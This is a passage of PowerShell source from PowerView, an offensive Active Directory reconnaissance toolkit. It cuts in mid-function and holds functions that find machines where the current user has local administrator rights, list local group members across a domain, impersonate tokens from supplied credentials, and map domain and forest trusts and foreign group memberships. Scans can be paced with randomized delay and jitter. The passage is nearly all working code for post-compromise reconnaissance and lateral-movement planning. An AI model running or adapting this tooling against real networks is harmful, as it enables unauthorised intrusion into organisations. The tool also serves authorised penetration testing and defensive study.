if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['ComputerName']) {
$TargetComputers = $ComputerName
}
else {
Write-Verbose '[Find-LocalAdminAccess] Querying computers in the domain'
$TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
Write-Verbose "[Find-LocalAdminAccess] TargetComputers length: $($TargetComputers.Length)"
if ($TargetComputers.Length -eq 0) {
throw '[Find-LocalAdminAccess] No hosts found to enumerate'
}
# the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
Param($ComputerName, $TokenHandle)
if ($TokenHandle) {
# impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
$Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
}
ForEach ($TargetComputer in $ComputerName) {
$Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
if ($Up) {
# check if the current user has local admin access to this server
$Access = Test-AdminAccess -ComputerName $TargetComputer
if ($Access.IsAdmin) {
$TargetComputer
}
}
}
if ($TokenHandle) {
Invoke-RevertToSelf
}
}
$LogonToken = $Null
if ($PSBoundParameters['Credential']) {
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
else {
$LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
}
}
}
PROCESS {
# only ignore threading if -Delay is passed
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
Write-Verbose "[Find-LocalAdminAccess] Total number of hosts: $($TargetComputers.count)"
Write-Verbose "[Find-LocalAdminAccess] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
$RandNo = New-Object System.Random
ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
Write-Verbose "[Find-LocalAdminAccess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $LogonToken
}
}
else {
Write-Verbose "[Find-LocalAdminAccess] Using threading with threads: $Threads"
# if we're using threading, kick off the script block with New-ThreadedFunction
$ScriptParams = @{
'TokenHandle' = $LogonToken
}
# if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
}
}
function Find-DomainLocalGroupMember {
<#
.SYNOPSIS
Enumerates the members of specified local group (default administrators)
for all the targeted machines on the current (or specified) domain.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction
.DESCRIPTION
This function enumerates all machines on the current (or specified) domain
using Get-DomainComputer, and enumerates the members of the specified local
group (default of Administrators) for each machine using Get-NetLocalGroupMember.
By default, the API method is used, but this can be modified with '-Method winnt'
to use the WinNT service provider.
.PARAMETER ComputerName
Specifies an array of one or more hosts to enumerate, passable on the pipeline.
If -ComputerName is not passed, the default behavior is to enumerate all machines
in the domain returned by Get-DomainComputer.
.PARAMETER ComputerDomain
Specifies the domain to query for computers, defaults to the current domain.
.PARAMETER ComputerLDAPFilter
Specifies an LDAP query string that is used to search for computer objects.
.PARAMETER ComputerSearchBase
Specifies the LDAP source to search through for computers,
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER ComputerOperatingSystem
Search computers with a specific operating system, wildcards accepted.
.PARAMETER ComputerServicePack
Search computers with a specific service pack, wildcards accepted.
.PARAMETER ComputerSiteName
Search computers in the specific AD Site name, wildcards accepted.
.PARAMETER GroupName
The local group name to query for users. If not given, it defaults to "Administrators".
.PARAMETER Method
The collection method to use, defaults to 'API', also accepts 'WinNT'.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain and target systems.
.PARAMETER Delay
Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.PARAMETER Threads
The number of threads to use for user searching, defaults to 20.
.EXAMPLE
Find-DomainLocalGroupMember
Enumerates the local group memberships for all reachable machines in the current domain.
.EXAMPLE
Find-DomainLocalGroupMember -Domain dev.testlab.local
Enumerates the local group memberships for all reachable machines the dev.testlab.local domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred
Enumerates the local group memberships for all reachable machines the dev.testlab.local
domain using the alternate credentials.
.OUTPUTS
PowerView.LocalGroupMember.API
Custom PSObject with translated group property fields from API results.
PowerView.LocalGroupMember.WinNT
Custom PSObject with translated group property fields from WinNT results.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.LocalGroupMember.API')]
[OutputType('PowerView.LocalGroupMember.WinNT')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DNSHostName')]
[String[]]
$ComputerName,
[ValidateNotNullOrEmpty()]
[String]
$ComputerDomain,
[ValidateNotNullOrEmpty()]
[String]
$ComputerLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$ComputerSearchBase,
[ValidateNotNullOrEmpty()]
[Alias('OperatingSystem')]
[String]
$ComputerOperatingSystem,
[ValidateNotNullOrEmpty()]
[Alias('ServicePack')]
[String]
$ComputerServicePack,
[ValidateNotNullOrEmpty()]
[Alias('SiteName')]
[String]
$ComputerSiteName,
[Parameter(ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[String]
$GroupName = 'Administrators',
[ValidateSet('API', 'WinNT')]
[Alias('CollectionMethod')]
[String]
$Method = 'API',
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[ValidateRange(1, 10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Int]
[ValidateRange(1, 100)]
$Threads = 20
)
BEGIN {
$ComputerSearcherArguments = @{
'Properties' = 'dnshostname'
}
if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['ComputerName']) {
$TargetComputers = $ComputerName
}
else {
Write-Verbose '[Find-DomainLocalGroupMember] Querying computers in the domain'
$TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
Write-Verbose "[Find-DomainLocalGroupMember] TargetComputers length: $($TargetComputers.Length)"
if ($TargetComputers.Length -eq 0) {
throw '[Find-DomainLocalGroupMember] No hosts found to enumerate'
}
# the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
Param($ComputerName, $GroupName, $Method, $TokenHandle)
if ($TokenHandle) {
# impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
$Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
}
ForEach ($TargetComputer in $ComputerName) {
$Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
if ($Up) {
$NetLocalGroupMemberArguments = @{
'ComputerName' = $TargetComputer
'Method' = $Method
'GroupName' = $GroupName
}
Get-NetLocalGroupMember @NetLocalGroupMemberArguments
}
}
if ($TokenHandle) {
Invoke-RevertToSelf
}
}
$LogonToken = $Null
if ($PSBoundParameters['Credential']) {
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
$LogonToken = Invoke-UserImpersonation -Credential $Credential
}
else {
$LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
}
}
}
PROCESS {
# only ignore threading if -Delay is passed
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
Write-Verbose "[Find-DomainLocalGroupMember] Total number of hosts: $($TargetComputers.count)"
Write-Verbose "[Find-DomainLocalGroupMember] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
$RandNo = New-Object System.Random
ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
Write-Verbose "[Find-DomainLocalGroupMember] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $GroupName, $Method, $LogonToken
}
}
else {
Write-Verbose "[Find-DomainLocalGroupMember] Using threading with threads: $Threads"
# if we're using threading, kick off the script block with New-ThreadedFunction
$ScriptParams = @{
'GroupName' = $GroupName
'Method' = $Method
'TokenHandle' = $LogonToken
}
# if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
}
END {
if ($LogonToken) {
Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
########################################################
#
# Domain trust functions below.
#
########################################################
function Get-DomainTrust {
<#
.SYNOPSIS
Return all domain trusts for the current domain or a specified domain.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Domain, Get-DomainSearcher, Get-DomainSID, PSReflect
.DESCRIPTION
This function will enumerate domain trust relationships for the current (or a remote)
domain using a number of methods. By default, the .NET method GetAllTrustRelationships()
is used on the System.DirectoryServices.ActiveDirectory.Domain object. If the -LDAP flag
is specified, or any of the LDAP-appropriate parameters, an LDAP search using the filter
'(objectClass=trustedDomain)' is used instead. If the -API flag is specified, the
Win32 API DsEnumerateDomainTrusts() call is used to enumerate instead.
.PARAMETER Domain
Specifies the domain to query for trusts, defaults to the current domain.
.PARAMETER API
Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in
.NET methods.
.PARAMETER LDAP
Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainTrust
Return domain trusts for the current domain using built in .NET methods.
.EXAMPLE
Get-DomainTrust -Domain "prod.testlab.local"
Return domain trusts for the "prod.testlab.local" domain using .NET methods
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainTrust -LDAP -Domain "prod.testlab.local" -Server "PRIMARY.testlab.local" -Credential $Cred
Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP
queries, binding to the PRIMARY.testlab.local server for queries, and using the specified
alternate credenitals.
.EXAMPLE
Get-DomainTrust -API -Domain "prod.testlab.local"
Return domain trusts for the "prod.testlab.local" domain enumerated through API calls.
.OUTPUTS
PowerView.DomainTrust.NET
A TrustRelationshipInformationCollection returned when using .NET methods (default).
PowerView.DomainTrust.LDAP
Custom PSObject with translated domain LDAP trust result fields.
PowerView.DomainTrust.API
Custom PSObject with translated domain API trust result fields.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.DomainTrust.NET')]
[OutputType('PowerView.DomainTrust.LDAP')]
[OutputType('PowerView.DomainTrust.API')]
[CmdletBinding(DefaultParameterSetName = 'NET')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name')]
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[Parameter(ParameterSetName = 'API')]
[Switch]
$API,
[Parameter(ParameterSetName = 'LDAP')]
[Switch]
$LDAP,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[Parameter(ParameterSetName = 'LDAP')]
[Parameter(ParameterSetName = 'API')]
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[Parameter(ParameterSetName = 'LDAP')]
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Parameter(ParameterSetName = 'LDAP')]
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Parameter(ParameterSetName = 'LDAP')]
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$TrustAttributes = @{
[uint32]'0x00000001' = 'non_transitive'
[uint32]'0x00000002' = 'uplevel_only'
[uint32]'0x00000004' = 'quarantined_domain'
[uint32]'0x00000008' = 'forest_transitive'
[uint32]'0x00000010' = 'cross_organization'
[uint32]'0x00000020' = 'within_forest'
[uint32]'0x00000040' = 'treat_as_external'
[uint32]'0x00000080' = 'trust_uses_rc4_encryption'
[uint32]'0x00000100' = 'trust_uses_aes_keys'
[uint32]'0x00000200' = 'cross_organization_no_tgt_delegation'
[uint32]'0x00000400' = 'pim_trust'
}
$LdapSearcherArguments = @{}
if ($PSBoundParameters['LDAPFilter']) { $LdapSearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['Properties']) { $LdapSearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $LdapSearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $LdapSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $LdapSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $LdapSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $LdapSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $LdapSearcherArguments['Credential'] = $Credential }
}
PROCESS {
if ($PsCmdlet.ParameterSetName -ne 'API') {
$NetSearcherArguments = @{}
if ($Domain -and $Domain.Trim() -ne '') {
$SourceDomain = $Domain
}
else {
if ($PSBoundParameters['Credential']) {
$SourceDomain = (Get-Domain -Credential $Credential).Name
}
else {
$SourceDomain = (Get-Domain).Name
}
}
$NetSearcherArguments['Domain'] = $SourceDomain
if ($PSBoundParameters['Credential']) { $NetSearcherArguments['Credential'] = $Credential }
}
else {
if ($Domain -and $Domain.Trim() -ne '') {
$SourceDomain = $Domain
}
else {
$SourceDomain = $Env:USERDNSDOMAIN
}
}
if ($PsCmdlet.ParameterSetName -eq 'LDAP') {
# if we're searching for domain trusts through LDAP/ADSI
$TrustSearcher = Get-DomainSearcher @LdapSearcherArguments
$SourceSID = Get-DomainSID @NetSearcherArguments
if ($TrustSearcher) {
$TrustSearcher.Filter = '(objectClass=trustedDomain)'
if ($PSBoundParameters['FindOne']) { $Results = $TrustSearcher.FindOne() }
else { $Results = $TrustSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
$Props = $_.Properties
$DomainTrust = New-Object PSObject
$TrustAttrib = @()
$TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] }
$Direction = Switch ($Props.trustdirection) {
0 { 'Disabled' }
1 { 'Inbound' }
2 { 'Outbound' }
3 { 'Bidirectional' }
}
$ObjectGuid = New-Object Guid @(,$Props.objectguid[0])
$TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value
$DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain
$DomainTrust | Add-Member Noteproperty 'SourceSID' $SourceSID
$DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0]
$DomainTrust | Add-Member Noteproperty 'TargetSID' $TargetSID
$DomainTrust | Add-Member Noteproperty 'ObjectGuid' "{$ObjectGuid}"
$DomainTrust | Add-Member Noteproperty 'TrustType' $($TrustAttrib -join ',')
$DomainTrust | Add-Member Noteproperty 'TrustDirection' "$Direction"
$DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.LDAP')
$DomainTrust
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainTrust] Error disposing of the Results object: $_"
}
}
$TrustSearcher.dispose()
}
}
elseif ($PsCmdlet.ParameterSetName -eq 'API') {
# if we're searching for domain trusts through Win32 API functions
if ($PSBoundParameters['Server']) {
$TargetDC = $Server
}
elseif ($Domain -and $Domain.Trim() -ne '') {
$TargetDC = $Domain
}
else {
# see https://msdn.microsoft.com/en-us/library/ms675976(v=vs.85).aspx for default NULL behavior
$TargetDC = $Null
}
# arguments for DsEnumerateDomainTrusts
$PtrInfo = [IntPtr]::Zero
# 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND
$Flags = 63
$DomainCount = 0
# get the trust information from the target server
$Result = $Netapi32::DsEnumerateDomainTrusts($TargetDC, $Flags, [ref]$PtrInfo, [ref]$DomainCount)
# Locate the offset of the initial intPtr
$Offset = $PtrInfo.ToInt64()
# 0 = success
if (($Result -eq 0) -and ($Offset -gt 0)) {
# Work out how much to increment the pointer by finding out the size of the structure
$Increment = $DS_DOMAIN_TRUSTS::GetSize()
# parse all the result structures
for ($i = 0; ($i -lt $DomainCount); $i++) {
# create a new int ptr at the given offset and cast the pointer as our result structure
$NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
$Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS
$Offset = $NewIntPtr.ToInt64()
$Offset += $Increment
$SidString = ''
$Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ($Result -eq 0) {
Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
else {
$DomainTrust = New-Object PSObject
$DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain
$DomainTrust | Add-Member Noteproperty 'TargetName' $Info.DnsDomainName
$DomainTrust | Add-Member Noteproperty 'TargetNetbiosName' $Info.NetbiosDomainName
$DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags
$DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex
$DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType
$DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes
$DomainTrust | Add-Member Noteproperty 'TargetSid' $SidString
$DomainTrust | Add-Member Noteproperty 'TargetGuid' $Info.DomainGuid
$DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.API')
$DomainTrust
}
}
# free up the result buffer
$Null = $Netapi32::NetApiBufferFree($PtrInfo)
}
else {
Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
else {
# if we're searching for domain trusts through .NET methods
$FoundDomain = Get-Domain @NetSearcherArguments
if ($FoundDomain) {
$FoundDomain.GetAllTrustRelationships() | ForEach-Object {
$_.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.NET')
$_
}
}
}
}
}
function Get-ForestTrust {
<#
.SYNOPSIS
Return all forest trusts for the current forest or a specified forest.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Forest
.DESCRIPTION
This function will enumerate domain trust relationships for the current (or a remote)
forest using number of method using the .NET method GetAllTrustRelationships() on a
System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
.PARAMETER Forest
Specifies the forest to query for trusts, defaults to the current forest.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-ForestTrust
Return current forest trusts.
.EXAMPLE
Get-ForestTrust -Forest "external.local"
Return trusts for the "external.local" forest.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-ForestTrust -Forest "external.local" -Credential $Cred
Return trusts for the "external.local" forest using the specified alternate credenitals.
.OUTPUTS
PowerView.DomainTrust.NET
A TrustRelationshipInformationCollection returned when using .NET methods (default).
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.ForestTrust.NET')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name')]
[ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
$NetForestArguments = @{}
if ($PSBoundParameters['Forest']) { $NetForestArguments['Forest'] = $Forest }
if ($PSBoundParameters['Credential']) { $NetForestArguments['Credential'] = $Credential }
$FoundForest = Get-Forest @NetForestArguments
if ($FoundForest) {
$FoundForest.GetAllTrustRelationships() | ForEach-Object {
$_.PSObject.TypeNames.Insert(0, 'PowerView.ForestTrust.NET')
$_
}
}
}
}
function Get-DomainForeignUser {
<#
.SYNOPSIS
Enumerates users who are in groups outside of the user's domain.
This is a domain's "outgoing" access.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Domain, Get-DomainUser
.DESCRIPTION
Uses Get-DomainUser to enumerate all users for the current (or target) domain,
then calculates the given user's domain name based on the user's distinguishedName.
This domain name is compared to the queried domain, and the user object is
output if they differ.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainForeignUser
Return all users in the current domain who are in groups not in the
current domain.
.EXAMPLE
Get-DomainForeignUser -Domain dev.testlab.local
Return all users in the dev.testlab.local domain who are in groups not in the
dev.testlab.local domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
Return all users in the dev.testlab.local domain who are in groups not in the
dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and
using the specified alternate credentials.
.OUTPUTS
PowerView.ForeignUser
Custom PSObject with translated user property fields.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.ForeignUser')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name')]
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{}
$SearcherArguments['LDAPFilter'] = '(memberof=*)'
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw }
}
PROCESS {
if ($PSBoundParameters['Domain']) {
$SearcherArguments['Domain'] = $Domain
$TargetDomain = $Domain
}
elseif ($PSBoundParameters['Credential']) {
$TargetDomain = Get-Domain -Credential $Credential | Select-Object -ExpandProperty name
}
elseif ($Env:USERDNSDOMAIN) {
$TargetDomain = $Env:USERDNSDOMAIN
}
else {
throw "[Get-DomainForeignUser] No domain found to enumerate!"
}
Get-DomainUser @SearcherArguments | ForEach-Object {
ForEach ($Membership in $_.memberof) {
$Index = $Membership.IndexOf('DC=')
if ($Index) {
$GroupDomain = $($Membership.SubString($Index)) -replace 'DC=','' -replace ',','.'
if ($GroupDomain -ne $TargetDomain) {
